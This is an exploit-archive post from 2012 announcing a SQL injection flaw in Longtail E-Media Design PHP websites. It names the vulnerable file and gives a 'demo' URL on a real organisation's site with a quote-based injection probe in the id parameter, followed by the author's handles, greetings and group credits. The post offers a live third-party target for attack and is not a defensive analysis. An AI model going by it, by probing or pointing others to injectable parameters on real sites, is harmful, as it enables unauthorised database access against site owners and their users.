Longtail E-Media Design SQL Injection

2012-03-06T00:00:00
ID PACKETSTORM:110539
Type packetstorm
Reporter 3spi0n
Modified 2012-03-06T00:00:00

Description

                                        
                                            `# Exploit Title: Longtail E-media Design SQL Injection Vulnerability  
# Date: 07/03/2012  
# Author: 3spi0n  
# Software Website: http://www.longtail.info/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
[$] Vulnerable File:  
  
[~] inners.php  
  
[$] Demo ;  
  
www.nast.org.np/inner.php?page=newsdetail&id=2' [MySQLi]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Dar bi Koridor Benimki, Kendimi Aradigim.  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne  
  
# Official Blog ; www.Ryuzaki.in  
  
# Greetz : Grayhatz.Co  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
- Mr.PaPaRoSSe And 3spi0n -  
  
Bug Researcher Group - TURKEY  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`